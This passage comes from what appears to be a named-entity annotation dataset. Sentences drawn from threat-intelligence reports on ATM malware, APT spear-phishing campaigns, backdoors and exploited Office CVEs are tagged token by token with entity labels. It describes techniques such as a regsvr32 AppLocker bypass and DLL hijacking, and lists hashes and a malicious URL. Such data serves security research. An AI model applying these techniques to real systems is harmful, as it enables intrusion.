+enabled O +criminals O +to O +empty O +ATMs O +using O +either O +an O +external O +keyboard O +attached O +to O +the O +machine O +or O +via O +SMS O +message O +, O +a O +technique O +that O +had O +never O +been O +seen O +before O +. O + +FireEye S-SECTEAM +Labs O +recently O +identified O +a O +previously O +unobserved O +version O +of O +Ploutus S-FILE +, O +dubbed O +Ploutus-D S-FILE +, O +that O +interacts O +with O +KAL’s O +Kalignite O +multivendor O +ATM O +platform O +. O + +The O +samples S-FILE +we O +identified O +target O +the O +ATM B-IDTY +vendor I-IDTY +Diebold E-IDTY +. 
O + +This O +blog O +covers O +the O +changes O +, O +improvements O +, O +and O +Indicators O +of O +Compromise O +(IOC) O +of O +Ploutus-D S-FILE +in O +order O +to O +help O +financial S-IDTY +organizations O +identify O +and O +defend O +against O +this O +threat O +. O + +Ploutus-D S-FILE +also O +allows O +the O +attackers S-APT +to O +enter O +the O +amount O +to O +withdraw O +(billUnits O +– O +4 O +digits) O +and O +the O +number O +of O +cycles O +(billCount O +– O +2 O +digits) O +to O +repeat O +the O +dispensing O +operation O +(see O +Figure O +10) O +. O + +Ploutus-D S-FILE +will O +load O +KXCashDispenserLib” O +library O +implemented O +by O +Kalignite O +Platform O +(K3A.Platform.dll) S-FILE +to O +interact O +with O +the O +XFS O +Manager O +and O +control O +the O +Dispenser O +(see O +Figure O +13) O +. O + +Since O +Ploutus-D S-FILE +interacts O +with O +the O +Kalignite O +Platform O +, O +only O +minor O +modifications O +to O +the O +Ploutus-D S-FILE +code O +may O +be O +required O +to O +target O +different O +ATM B-IDTY +vendors E-IDTY +worldwide O +. O + +The O +threat O +actors S-APT +used O +two O +publicly O +available O +techniques O +, O +an O +AppLocker O +whitelisting O +bypass O +and O +a O +script O +to O +inject B-ACT +shellcode E-ACT +into O +the O +userinit.exe S-FILE +process O +. O + +The O +regsvr32.exe S-FILE +executable O +can O +be O +used O +to O +download O +a O +Windows S-OS +Script O +Component O +file O +(SCT O +file) O +by O +passing O +the O +URL O +of O +the O +SCT B-FILE +file E-FILE +as O +an O +argument O +. O + +We O +observed O +implementation O +of O +this O +bypass O +in O +the O +macro O +code O +to O +invoke O +regsvr32.exe S-FILE +, O +along O +with O +a O +URL O +passed O +to O +it O +which O +was O +hosting O +a O +malicious O +SCT B-FILE +file E-FILE +. 
O + +There O +was O +code O +to O +download O +a O +decoy O +document O +from O +the O +Internet O +and O +open O +it O +in O +a O +second O +winword.exe S-FILE +process O +using O +the O +Start-Process S-FILE +cmdlet S-FILE +. O + +Ordnance S-FILE +will O +be O +able O +to O +immediately O +generate O +shellcode O +after O +users O +provide O +the O +IP S-PROT +and O +PROT O +that O +the O +shellcode S-FILE +should O +connect O +to O +or O +listen O +on O +. O + +DarkPulsar S-MAL +is O +a O +very O +interesting O +administrative O +module O +for O +controlling O +a O +passive O +backdoor S-MAL +named O +' O +sipauth32.tsp S-FILE +' O +that O +provides O +remote O +control O +, O +belonging O +to O +this O +category O +. O + +One O +of O +them O +– O +ipv4.dll S-FILE +– O +has O +been O +placed O +by O +the O +APT O +with O +what O +is O +, O +in O +fact O +, O +a O +downloader S-MAL +for O +other O +malicious O +components O +. O + +Written O +in O +pure O +C S-TOOL +language O +, O +Canhadr/Ndriver S-FILE +provides O +full O +access O +to O +the O +hard O +drive O +and O +operating O +memory O +despite O +device O +security O +restrictions O +, O +and O +carries O +out O +integrity O +control O +of O +various O +system O +components O +to O +avoid O +debugging O +and O +security O +detection O +. O + +First O +observed O +in O +mid-2014 S-TIME +, O +this O +malware O +shared O +code O +with O +the O +Bugat S-MAL +( O +aka O +Feodo S-MAL +) O +banking S-IDTY +Trojan S-MAL +. O + +In O +all O +emails S-TOOL +sent O +to O +these O +government B-IDTY +officials E-IDTY +, O +the O +actor O +used O +the O +same O +attachment O +: O +a O +malicious B-FILE +Microsoft I-FILE +Word I-FILE +document E-FILE +that O +exploited O +the O +CVE-2012-0158 S-VULID +vulnerability O +to O +drop O +a O +malicious O +payload O +. 
O + +Despite O +being O +an O +older O +vulnerability O +, O +many O +threat O +actors O +continue O +to O +leverage O +CVE-2012-0158 S-VULID +to O +exploit S-VULNAME +Microsoft B-FILE +Word E-FILE +. O + +Whitefly S-APT +first O +infects O +its O +victims O +using O +a O +dropper S-MAL +in O +the O +form O +of O +a O +malicious.exe S-FILE +or O +.dll B-FILE +file E-FILE +that O +is O +disguised O +as O +a O +document O +or O +image O +. O + +CraP2P S-FILE +has O +frequently O +been O +used O +to O +distribute O +other O +malware O +such O +as O +Locky S-MAL +and O +Dridex S-MAL +, O +but O +also O +supported O +large O +scale O +spam B-ACT +campaigns E-ACT +for O +dating O +advertisement O +and O +pump-and-dump O +scams O +after O +the O +demise O +of O +Kelihos O +. O + +Once O +the O +LOWBALL S-MAL +malware S-MAL +calls O +back O +to O +the O +Dropbox S-TOOL +account O +, O +the O +admin@338 S-APT +will O +create O +a O +file O +called O +upload.bat S-FILE +which O +contains O +commands O +to O +be O +executed O +on O +the O +compromised O +computer O +. O + +In O +2014 S-TIME +, O +APT32 S-APT +leveraged O +a O +spear-phishing S-ACT +attachment E-ACT +titled O +" O +Plans O +to O +crackdown O +on O +protesters O +at O +the O +Embassy O +of O +Vietnam.exe S-FILE +, O +" O +which O +targeted O +dissident O +activity O +among O +the O +Vietnamese S-LOC +diaspora S-IDTY +in O +Southeast B-LOC +Asia E-LOC +. O + +In O +2014 S-TIME +, O +APT32 S-APT +leveraged O +a O +spear-phishing S-ACT +attachment E-ACT +titled O +" O +Plans O +to O +crackdown O +on O +protesters O +at O +the O +Embassy O +of O +Vietnam.exe S-FILE +" O +. 
O + +More O +recently O +, O +in O +May B-TIME +2017 E-TIME +, O +APT33 S-APT +appeared O +to O +target O +a O +Saudi S-LOC +organization S-IDTY +and O +a O +South B-LOC +Korean E-LOC +business B-IDTY +conglomerate E-IDTY +using O +a O +malicious B-FILE +file E-FILE +that O +attempted O +to O +entice O +victims O +with O +job O +vacancies O +for O +a O +Saudi B-LOC +Arabian E-LOC +petrochemical B-IDTY +company E-IDTY +. O + +More O +recently O +, O +in O +May B-TIME +2017 E-TIME +, O +APT33 S-APT +appeared O +to O +target O +organizations O +in O +Saudi S-LOC +and O +South B-LOC +Korea E-LOC +using O +a O +malicious B-FILE +file E-FILE +that O +attempted O +to O +entice O +victims O +with O +job O +vacancies O +. O + +In O +fact O +, O +REDBALDKNIGHT S-APT +has O +been O +targeting O +Japan S-LOC +as O +early O +as O +2008 S-TIME +, O +based O +on O +the O +file O +properties O +of O +the O +decoy B-FILE +documents E-FILE +they've O +been O +sending O +to O +their O +targets O +. O + +In O +fact O +, O +REDBALDKNIGHT S-APT +has O +been O +zeroing O +in O +on O +Japanese S-LOC +organizations O +as O +early O +as O +2008 S-TIME +— O +at O +least O +based O +on O +the O +file O +properties O +of O +the O +decoy B-FILE +documents E-FILE +they've O +been O +sending O +to O +their O +targets O +. O + +Carbanak S-FILE +is O +a O +backdoor S-MAL +used O +by O +the O +attackers S-APT +to O +compromise O +the O +victim O +. O + +This O +Gorgon B-ACT +Group I-ACT +campaign E-ACT +leveraged O +spear B-ACT +phishing E-ACT +emails S-TOOL +with O +Microsoft B-FILE +Word I-FILE +documents E-FILE +exploiting O +CVE-2017-0199 S-VULID +. O + +The O +Korean-language O +Word B-MAL +document E-MAL +manual.doc S-FILE +appeared O +in O +Vietnam S-LOC +on O +January B-TIME +17 E-TIME +, O +with O +the O +original O +author O +name O +of O +Honeybee S-APT +. 
O + +This O +malicious O +document O +contains O +a O +Visual B-ACT +Basic I-ACT +macro E-ACT +that O +dropped O +and O +executed O +an O +upgraded O +version O +of O +the O +implant O +known O +as O +SYSCON S-MAL +, O +which O +appeared O +in O +2017 S-TIME +in O +malicious B-FILE +Word I-FILE +documents E-FILE +as O +part O +of O +several O +campaigns S-ACT +using O +North S-LOC +Korea–related O +topics O +. O + +Ke3chang S-APT +has O +also O +leveraged O +a O +Java S-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2012-4681 S-VULID +) O +, O +as O +well O +as O +older O +, O +reliable O +exploits O +for O +Microsoft B-FILE +Word E-FILE +( O +CVE-2010-3333 S-VULID +) O +and O +Adobe B-MAL +PDF I-MAL +Reader E-MAL +( O +CVE-2010-2883 S-VULID +) O +. O + +For O +example O +, O +DeltaAlfa S-FILE +specifies O +a O +DDoS B-MAL +bot E-MAL +family O +identified O +as O +Alfa O +. O + +This O +alert O +'s O +IOC B-FILE +files E-FILE +provide O +HIDDEN B-APT +COBRA E-APT +indicators O +related O +to O +FALLCHILL S-MAL +. O + +The O +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +discovered O +a O +previously O +unknown O +data-gathering B-FILE +implant E-FILE +that O +surfaced O +in O +mid-February B-TIME +2018 E-TIME +. O + +This O +alert O +'s O +IOC B-FILE +files E-FILE +provide O +HIDDEN B-APT +COBRA E-APT +indicators O +related O +to O +FALLCHILL S-MAL +. O + +The O +McAfee B-SECTEAM +Advanced I-SECTEAM +Threat I-SECTEAM +Research E-SECTEAM +team O +discovered O +a O +previously O +unknown O +data-gathering B-FILE +implant E-FILE +that O +surfaced O +in O +mid-February B-TIME +2018 E-TIME +. O + +Documents S-FILE +with O +the O +flash S-TOOL +exploit S-VULNAME +managed O +to O +evade O +static O +defenses O +and O +remain O +undetected O +as O +an O +exploit S-VULNAME +on O +VirusTotal S-TOOL +. 
O + +This O +malware O +report O +contains O +analysis O +of O +one O +32-bit B-FILE +Windows I-FILE +executable I-FILE +file E-FILE +, O +identified O +as O +a O +Remote B-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +In O +one O +of O +the O +samples O +received O +for O +analysis O +, O +the O +US-CERT B-SECTEAM +Code I-SECTEAM +Analysis I-SECTEAM +Team E-SECTEAM +observed O +botnet B-FILE +controller E-FILE +functionality O +. O + +Volgmer S-MAL +payloads O +have O +been O +observed O +in O +32-bit O +form O +as O +either O +executables O +or O +dynamic-link B-TOOL +library E-TOOL +( O +.dll S-FILE +) O + +Trend B-SECTEAM +Micro E-SECTEAM +endpoint O +solutions O +such O +as O +Trend B-SECTEAM +Micro™ I-SECTEAM +Smart I-SECTEAM +Protection I-SECTEAM +Suites E-SECTEAM +and O +Worry-Free™ B-SECTEAM +Business I-SECTEAM +Security E-SECTEAM +can O +protect O +users O +and O +businesses S-IDTY +from O +these O +threats O +by O +detecting O +malicious B-FILE +files E-FILE +and O +spammed O +messages O +as O +well O +as O +blocking O +all O +related O +malicious O +URLs O +. O + +WannaCry S-MAL +appends O +encrypted O +data O +files O +with O +the O +.WCRY S-FILE +extension O +, O +drops O +and O +executes O +a O +decryptor O +tool O +, O +and O +demands O +$300 O +or O +$600 O +USD O +( O +via O +Bitcoin S-TOOL +) O +to O +decrypt O +the O +data O +. O + +Some O +of O +the O +documents S-FILE +exploited O +CVE-2017-0199 S-VULID +to O +deliver O +the O +payload O +. O + +The O +Leviathan S-APT +also O +occasionally O +used O +macro-laden B-FILE +Microsoft I-FILE +Word I-FILE +documents E-FILE +to O +target O +other O +US S-LOC +research O +and O +development B-IDTY +organizations E-IDTY +during O +this O +period O +. 
O + +The O +download O +name O +was O +" O +Zawgyi_Keyboard_L.zip S-FILE +" O +, O +and O +it O +dropped O +a O +" O +setup.exe S-FILE +" O +that O +contained O +several O +backdoor O +components O +, O +including O +an O +Elise S-MAL +" O +wincex.dll S-FILE +" O +( O +a42c966e26f3577534d03248551232f3 S-MD5 +, O +detected O +as O +Backdoor.Win32.Agent.delp S-MAL +) O +. O + +Both O +attachments O +are O +malicious B-FILE +Word I-FILE +documents E-FILE +that O +attempt O +to O +exploit S-VULNAME +the O +Windows S-OS +OLE B-TOOL +Automation I-TOOL +Array I-TOOL +Remote I-TOOL +Code I-TOOL +Execution E-TOOL +Vulnerability S-VULNAME +tracked O +by O +CVE-2014-6332 S-VULID +. O + +To O +set O +up O +persistence O +, O +the O +loader O +writes O +a O +file O +to O +" O +c:\temp\rr.exe S-FILE +" O +and O +executes O +it O +with O +specific O +command O +line O +arguments O +to O +create O +auto O +run O +registry O +keys O +. O + +The O +Magic B-ACT +Hound I-ACT +campaign E-ACT +was O +also O +discovered O +using O +a O +custom B-MAL +dropper E-MAL +tool O +, O +which O +we O +have O +named O +MagicHound.DropIt S-FILE +. O + +For O +example O +, O +we O +analyzed O +a O +DropIt S-MAL +sample O +( O +SHA256 S-ENCR +: O +cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 S-SHA2 +) O +that O +dropped O +two O +executables O +, O +one O +of O +which O +was O +saved O +to O +" O +%TEMP%\flash_update.exe S-FILE +" O +that O +was O +a O +legitimate O +Flash B-MAL +Player I-MAL +installer E-MAL +. O + +During O +a O +recent O +campaign O +, O +APT32 S-APT +leveraged O +social B-ACT +engineering E-ACT +emails S-TOOL +with O +Microsoft B-FILE +ActiveMime I-FILE +file E-FILE +attachments O +to O +deliver O +malicious O +macros O +. O + +The O +HTA B-FILE +files E-FILE +contained O +job O +descriptions O +and O +links O +to O +job O +postings O +on O +popular O +employment O +websites O +. 
O + +These O +emails S-TOOL +included O +recruitment-themed B-ACT +lures E-ACT +and O +links O +to O +malicious O +HTML B-TOOL +Application E-TOOL +( O +HTA S-TOOL +) O +files O +. O + +POWRUNER S-MAL +was O +delivered O +using O +a O +malicious O +RTF B-FILE +file E-FILE +that O +exploited O +CVE-2017-0199 S-VULID +. O + +ChopShop1 S-FILE +is O +a O +new O +framework O +developed O +by O +the O +MITRE B-IDTY +Corporation E-IDTY +for O +network-based O +protocol O +decoders O +that O +enable O +security O +professionals O +to O +understand O +actual O +commands O +issued O +by O +human O +operators O +controlling O +endpoints O +. O + +Attachments S-FILE +are O +typically O +sent O +as O +an O +executable O +file O +embedded O +in O +a O +ZIP B-ACT +archive E-ACT +or O +a O +password-protected B-ACT +Microsoft I-ACT +Office I-ACT +document E-ACT +. O + +This O +blog O +post O +analyzes O +several O +recent O +Molerats B-ACT +attacks E-ACT +that O +deployed O +PIVY S-MAL +against O +targets O +in O +the O +Middle B-LOC +East E-LOC +and O +in O +the O +U.S. S-LOC +We O +also O +examine O +additional O +PIVY B-ACT +attacks E-ACT +that O +leverage O +Arabic-language O +content O +related O +to O +the O +ongoing O +crisis O +in O +Egypt S-LOC +and O +the O +wider O +Middle B-LOC +East E-LOC +to O +lure O +targets O +into O +opening O +malicious B-FILE +files E-FILE +. O + +The O +archive O +contains O +an O +.exe B-FILE +file E-FILE +, O +sometimes O +disguised O +as O +a O +Microsoft B-FILE +Word I-FILE +file E-FILE +, O +a O +video O +, O +or O +another O +file O +format O +, O +using O +the O +corresponding O +icon O +. 
O + +The O +Palo B-SECTEAM +Alto I-SECTEAM +Networks I-SECTEAM +Unit I-SECTEAM +42 E-SECTEAM +research O +team O +recently O +came O +across O +a O +series O +of O +malicious B-FILE +files E-FILE +which O +were O +almost O +identical O +to O +those O +targeting O +the O +Saudi B-LOC +Arabian E-LOC +government S-IDTY +previously O +discussed O +by O +MalwareBytes S-SECTEAM +. O + +We O +found O +new O +variants O +of O +the O +Powermud B-MAL +backdoor E-MAL +, O +a O +new O +backdoor O +( O +Backdoor.Powemuddy S-MAL +) O +, O +and O +custom B-MAL +tools E-MAL +for O +stealing O +passwords O +, O +creating O +reverse O +shells O +, O +privilege O +escalation O +, O +and O +the O +use O +of O +the O +native O +Windows S-OS +cabinet O +creation O +tool O +, O +makecab.exe S-FILE +, O +probably O +for O +compressing O +stolen O +data O +to O +be O +uploaded O +. O + +Analysts O +in O +our O +DeepSight B-SECTEAM +Managed I-SECTEAM +Adversary I-SECTEAM +and I-SECTEAM +Threat I-SECTEAM +Intelligence E-SECTEAM +( O +MATI S-SECTEAM +) O +team O +have O +found O +a O +new O +backdoor O +, O +Backdoor.Powemuddy S-FILE +, O +new O +variants O +of O +Seedworm S-APT +'s O +Powermud B-FILE +backdoor E-FILE +( O +aka O +POWERSTATS S-MAL +) O +, O +a O +GitHub O +repository O +used O +by O +the O +group O +to O +store O +their O +scripts O +, O +as O +well O +as O +several O +post-compromise O +tools O +the O +group O +uses O +to O +exploit S-VULNAME +victims O +once O +they O +have O +established O +a O +foothold O +in O +their O +network O +. O + +Like O +the O +previous O +campaigns S-ACT +, O +these O +samples O +again O +involve O +a O +Microsoft B-TOOL +Word E-TOOL +document O +embedded O +with O +a O +malicious O +macro O +that O +is O +capable O +of O +executing O +PowerShell S-TOOL +( O +PS S-TOOL +) O +scripts O +leading O +to O +a O +backdoor O +payload O +. 
O + +In O +May B-TIME +2018 E-TIME +, O +Trend B-SECTEAM +Micro E-SECTEAM +found O +a O +new O +sample O +( O +Detected O +as O +W2KM_DLOADR.UHAOEEN S-MAL +) O +that O +may O +be O +related O +to O +this O +campaign O +. O + +In O +May B-TIME +2018 E-TIME +, O +Trend B-SECTEAM +Micro E-SECTEAM +found O +a O +new O +sample O +( O +Detected O +as O +W2KM_DLOADR.UHAOEEN S-MAL +) O +that O +may O +be O +related O +to O +this O +campaign O +. O + +This O +bait B-FILE +document E-FILE +, O +or O +email B-ACT +attachment E-ACT +, O +appears O +to O +be O +a O +standard O +Word S-TOOL +document O +, O +but O +is O +in O +fact O +an O +CVE-2012-0158 S-VULID +exploit S-VULNAME +, O +an O +executable O +with O +a O +double O +extension O +, O +or O +an O +executable O +with O +an O +RTLO O +filename O +, O +so O +it O +can O +execute O +code O +without O +the O +user O +'s O +knowledge O +or O +consent O +. O + +Taking O +a O +step O +back O +, O +as O +discussed O +in O +the O +Appendix O +in O +our O +initial O +OilRig S-APT +blog O +, O +Clayslide B-FILE +delivery I-FILE +documents E-FILE +initially O +open O +with O +a O +worksheet O +named O +" O +Incompatible O +" O +that O +displays O +content O +that O +instructs O +the O +user O +to O +" O +Enable O +Content O +" O +to O +see O +the O +contents O +of O +the O +document O +, O +which O +in O +fact O +runs O +the O +malicious O +macro O +and O +compromises O +the O +system O +. O + +The O +backdoor O +was O +delivered O +via O +a O +malicious O +.rtf B-FILE +file E-FILE +that O +exploited O +CVE-2017-0199 S-VULID +. O + +The O +vulnerability O +exists O +in O +the O +old O +Equation B-MAL +Editor E-MAL +( O +EQNEDT32.EXE S-FILE +) O +, O +a O +component O +of O +Microsoft S-IDTY +Office O +that O +is O +used O +to O +insert O +and O +evaluate O +mathematical O +formulas O +. 
O + +The O +January B-ACT +8 I-ACT +attack E-ACT +used O +a O +variant O +of O +the O +ThreeDollars B-FILE +delivery I-FILE +document E-FILE +, O +which O +we O +identified O +as O +part O +of O +the O +OilRig S-APT +toolset O +based O +on O +attacks O +that O +occurred O +in O +August B-TIME +2017 E-TIME +. O + +The O +email S-ACT +contained O +an O +attachment O +named O +Seminar-Invitation.doc S-FILE +, O +which O +is O +a O +malicious O +Microsoft B-TOOL +Word E-TOOL +document O +we O +track O +as O +ThreeDollars S-MAL +. O + +We O +also O +identified O +another O +sample O +of O +ThreeDollars S-MAL +, O +created O +on O +January B-TIME +15 E-TIME +, O +2017 S-TIME +with O +the O +file O +name O +strategy O +preparation.dot S-FILE +. O + +We O +had O +previously O +observed O +this O +author O +name O +in O +use O +once O +before O +, O +in O +the O +very O +first O +ThreeDollars B-FILE +document E-FILE +we O +collected O +that O +we O +had O +reported O +on O +in O +August B-TIME +2017 E-TIME +. O + +The O +June B-TIME +2017 E-TIME +sample O +of O +Clayslide S-MAL +contained O +the O +same O +OfficeServicesStatus.vbs B-FILE +file E-FILE +found O +in O +the O +ISMAgent B-MAL +Clayslide I-MAL +document E-MAL +, O +but O +instead O +of O +having O +the O +payload O +embedded O +in O +the O +macro O +as O +segregated O +base64 O +strings O +that O +would O +be O +concatenated O +, O +this O +variant O +obtained O +its O +payload O +from O +multiple O +cells O +within O +the O +" O +Incompatible O +" O +worksheet O +. O + +During O +this O +testing O +, O +we O +saw O +document O +filenames O +that O +contain O +the O +C2 S-TOOL +we O +witnessed O +in O +the O +targeted B-ACT +attack E-ACT +above O +, O +specifically O +the O +filenames O +XLS-withyourface.xls S-FILE +and O +XLS-withyourface B-FILE +– I-FILE +test.xls E-FILE +. 
O + +These O +samples O +appeared O +to O +have O +been O +created O +by O +OilRig S-APT +during O +their O +development O +and O +testing B-ACT +activities E-ACT +, O +all O +of O +which O +share O +many O +similarities O +with O +the O +delivery O +document O +used O +in O +the O +recent O +OilRig B-APT +attack E-APT +against O +a O +Middle B-LOC +Eastern E-LOC +government S-IDTY +, O +N56.15.doc S-FILE +( O +7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 S-SHA2 +) O +that O +we O +have O +also O +included O +in O +Table O +1 O +. O + +The O +attackers S-APT +sent O +multiple O +emails S-TOOL +containing O +macro-enabled O +XLS B-FILE +files E-FILE +to O +employees B-IDTY +working I-IDTY +in I-IDTY +the I-IDTY +banking I-IDTY +sector E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +In O +the O +first O +week O +of O +May B-TIME +2016 E-TIME +, O +FireEye B-SECTEAM +'s I-SECTEAM +DTI E-SECTEAM +identified O +a O +wave O +of O +emails S-TOOL +containing O +malicious B-FILE +attachments E-FILE +being O +sent O +to O +multiple O +banks S-IDTY +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +Their O +next O +move O +was O +to O +list O +any O +remote O +shared O +drives O +and O +then O +attempt O +to O +access O +remote O +shares O +owned O +by O +the O +specific O +government B-IDTY +office E-IDTY +they O +were O +targeting O +, O +again O +attempting O +to O +extract O +all O +Word B-FILE +documents E-FILE +. O + +For O +example O +, O +in O +September B-TIME +2016 E-TIME +, O +Sowbug S-APT +infiltrated O +an O +organization O +in O +Asia S-LOC +, O +deploying O +the O +Felismus B-MAL +backdoor E-MAL +on O +one O +of O +its O +computers O +, O +Computer O +A O +, O +using O +the O +file O +name O +adobecms.exe S-FILE +in O +CSIDL_WINDOWS\debug S-FILE +. 
O + +Symantec S-SECTEAM +has O +found O +evidence O +of O +Starloader B-FILE +files E-FILE +being O +named O +AdobeUpdate.exe S-FILE +, O +AcrobatUpdate.exe S-FILE +, O +and O +INTELUPDATE.EXE S-FILE +among O +others O +. O + +The O +attackers O +then O +began O +to O +perform O +reconnaissance O +activities S-ACT +on O +Computer O +A O +via O +cmd.exe S-FILE +, O +collecting O +system-related O +information O +, O +such O +as O +the O +OS O +version O +, O +hardware O +configuration O +, O +and O +network O +information O +. O + +In O +September B-TIME +2015 E-TIME +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +Anti-Targeted O +Attack O +Platform O +discovered O +anomalous B-FILE +network I-FILE +traffic E-FILE +in O +a O +government B-IDTY +organization E-IDTY +network O +. O + +Symantec S-SECTEAM +detects O +this O +threat O +as O +Backdoor.Nidiran S-FILE +. O + +Attackers O +have O +been O +known O +to O +distribute O +malicious B-FILE +files E-FILE +masquerading O +as O +the O +legitimate O +iviewers.dll B-MAL +file E-MAL +and O +then O +use O +DLL B-MAL +load I-MAL +hijacking E-MAL +to O +execute O +the O +malicious O +code O +and O +infect O +the O +computer O +. O + +Once O +exploit S-VULNAME +has O +been O +achieved O +, O +Nidiran S-MAL +is O +delivered O +through O +a O +self-extracting B-MAL +executable E-MAL +that O +extracts O +the O +components O +to O +a O +.tmp S-FILE +folder O +after O +it O +has O +been O +executed O +. O + +While O +there O +have O +been O +several O +Suckfly B-ACT +campaigns E-ACT +that O +infected O +organizations O +with O +the O +group O +'s O +custom O +malware O +Backdoor.Nidiran S-FILE +, O +the O +Indian O +targets O +show O +a O +greater O +amount O +of O +post-infection B-ACT +activity E-ACT +than O +targets O +in O +other O +regions O +. 
O + +While O +there O +have O +been O +several O +Suckfly B-ACT +campaigns E-ACT +that O +infected O +organizations O +with O +the O +group O +'s O +custom O +malware O +Backdoor.Nidiran S-FILE +, O +the O +Indian O +targets O +show O +a O +greater O +amount O +of O +post-infection B-ACT +activity E-ACT +than O +targets O +in O +other O +regions O +. O + +This O +time O +, O +however O +, O +TA459 O +opportunistically O +used O +spear-phishing S-ACT +emails S-TOOL +with O +a O +Microsoft B-FILE +Word I-FILE +attachment E-FILE +exploiting O +the O +recently O +patched O +CVE-2017-0199 S-VULID +to O +deploy O +the O +ZeroT B-MAL +Trojan E-MAL +, O +which O +in O +turn O +downloaded O +the O +PlugX B-MAL +Remote I-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +This O +time O +, O +however O +, O +attackers O +opportunistically O +used O +spear-phishing S-ACT +emails S-TOOL +with O +a O +Microsoft B-FILE +Word I-FILE +attachment E-FILE +exploiting O +the O +recently O +patched O +CVE-2017-0199 S-VULID +to O +deploy O +the O +ZeroT B-MAL +Trojan E-MAL +, O +which O +in O +turn O +downloaded O +the O +PlugX B-MAL +Remote I-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +Data O +from O +the O +early O +part O +of O +this O +year O +shows O +that O +the O +Taidoor O +attackers O +rampantly O +used O +malicious.DOC S-FILE +files O +to O +exploit S-VULNAME +a O +Microsoft S-IDTY +Common B-TOOL +Controls E-TOOL +vulnerability S-VULNAME +, O +CVE-2012-0158 S-VULID +. O + +To O +better O +understand O +how O +the O +adversary O +was O +operating O +and O +what O +other O +actions O +they O +had O +performed O +, O +CTU S-SECTEAM +researchers O +examined O +cmd.exe S-FILE +and O +its O +supporting O +processes O +to O +uncover O +additional O +command O +line O +artifacts O +. 
O + +In O +a O +separate O +incident O +, O +CTU S-SECTEAM +researchers O +identified O +a O +file O +named O +s.txt S-FILE +, O +which O +is O +consistent O +with O +the O +output O +of O +the O +Netview O +host-enumeration O +tool O +. O + +Thrip O +was O +attempting O +to O +remotely O +install O +a O +previously O +unknown O +piece O +of O +malware O +( O +Infostealer.Catchamas S-MAL +) O +on O +computers O +within O +the O +victim O +'s O +network O +. O + +Catchamas S-FILE +is O +a O +custom O +Trojan S-MAL +designed O +to O +steal O +information O +from O +an O +infected O +computer O +and O +contains O +additional O +features O +designed O +to O +avoid O +detection O +. O + +The O +malicious O +loader O +will O +use O +dynamic-link B-TOOL +library E-TOOL +( O +DLL S-TOOL +) O +hijacking O +— O +injecting O +malicious O +code O +into O +a O +process O +of O +a O +file/application O +— O +on O +sidebar.exe S-FILE +and O +launch O +dllhost.exe S-FILE +( O +a O +normal O +file O +) O +. O + +As O +we O +have O +noted O +in O +many O +earlier O +reports O +, O +attackers O +commonly O +use O +decoy B-FILE +files E-FILE +to O +trick O +victims O +into O +thinking O +a O +malicious O +document O +is O +actually O +legitimate O +. O + +The O +documents S-FILE +attached O +to O +spear-phishing S-ACT +e-mails E-ACT +used O +in O +both O +attacks O +contain O +code O +that O +exploits O +CVE-2012-0158 S-VULID +, O +which O +despite O +its O +age O +remains O +one O +of O +the O +most O +common O +Microsoft B-TOOL +Word E-TOOL +vulnerabilities S-VULNAME +being O +exploited O +by O +multiple O +threat O +actors O +. O + +Even O +an O +experienced O +user O +can O +be O +fooled O +by O +downloading O +a O +malicious B-FILE +file E-FILE +that O +is O +apparently O +from O +adobe.com S-ACT +, O +since O +the O +URL O +and O +the O +IP S-PROT +address O +correspond O +to O +Adobe O +'s O +legitimate O +infrastructure O +. 
O + +According O +to O +Deepen S-SECTEAM +, O +APT6 S-APT +has O +been O +using O +spear B-ACT +phishing E-ACT +in O +tandem O +with O +malicious O +PDF S-MAL +and O +ZIP S-MAL +attachments O +or O +links O +to O +malware O +infected O +websites O +that O +contains O +a O +malicious O +SCR B-FILE +file E-FILE +. O + +Bellingcat S-SECTEAM +also O +reported O +the O +domain O +had O +been O +used O +previously O +to O +host O +potential O +decoy B-FILE +documents E-FILE +as O +detailed O +in O +VirusTotal S-TOOL +here O +using O +http://voguextra.com/decoy.doc S-FILE +. O + +We O +identified O +an O +overlap O +in O +the O +domain O +voguextra.com O +, O +which O +was O +used O +by O +Bahamut S-APT +within O +their O +" O +Devoted B-FILE +To I-FILE +Humanity E-FILE +" O +app O +to O +host O +an O +image O +file O +and O +as O +C2 S-TOOL +server O +by O +the O +PrayTime O +iOS O +app O +mentioned O +in O +our O +first O +post O +. O + +While O +not O +detected O +at O +the O +time O +, O +Microsoft S-IDTY +'s O +antivirus O +and O +security O +products O +now O +detect O +this O +Barium S-APT +malicious O +file O +and O +flag O +the O +file O +as O +" O +Win32/ShadowPad.A S-FILE +" O +. O + +MXI B-FILE +Player E-FILE +appears O +to O +be O +a O +version O +of O +the O +Bahamut O +agent O +, O +designed O +to O +record O +the O +phone O +calls O +and O +collect O +other O +information O +about O +the O +user O +( O +com.mxi.videoplay S-DOM +) O +. O + +Like O +PLEAD S-ACT +, O +Shrouded B-ACT +Crossbow E-ACT +uses O +spear-phishing S-ACT +emails S-TOOL +with O +backdoor-laden O +attachments O +that O +utilize O +the O +RTLO B-MAL +technique E-MAL +and O +accompanied O +by O +decoy B-FILE +documents E-FILE +. 
O + +The O +self-extracting B-MAL +RAR E-MAL +writes O +a O +legitimate O +executable O +, O +an O +actor-created O +DLL S-TOOL +called O +Loader.dll S-FILE +and O +a O +file O +named O +readme.txt S-FILE +to O +the O +filesystem O +and O +then O +executes O +the O +legitimate O +executable O +. O + +Leader S-MAL +is O +Bookworm S-MAL +'s O +main O +module O +and O +controls O +all O +of O +the O +activities S-ACT +of O +the O +Trojan S-MAL +, O +but O +relies O +on O +the O +additional O +DLLs S-FILE +to O +provide O +specific O +functionality O +. O + +We O +speculate O +that O +other O +attacks O +delivering O +Bookworm S-MAL +were O +also O +targeting O +organizations O +in O +Thailand S-LOC +based O +on O +the O +contents O +of O +the O +associated O +decoys B-FILE +documents E-FILE +, O +as O +well O +as O +several O +of O +the O +dynamic B-MAL +DNS I-MAL +domain E-MAL +names O +used O +to O +host O +C2 S-TOOL +servers O +that O +contain O +the O +words O +" 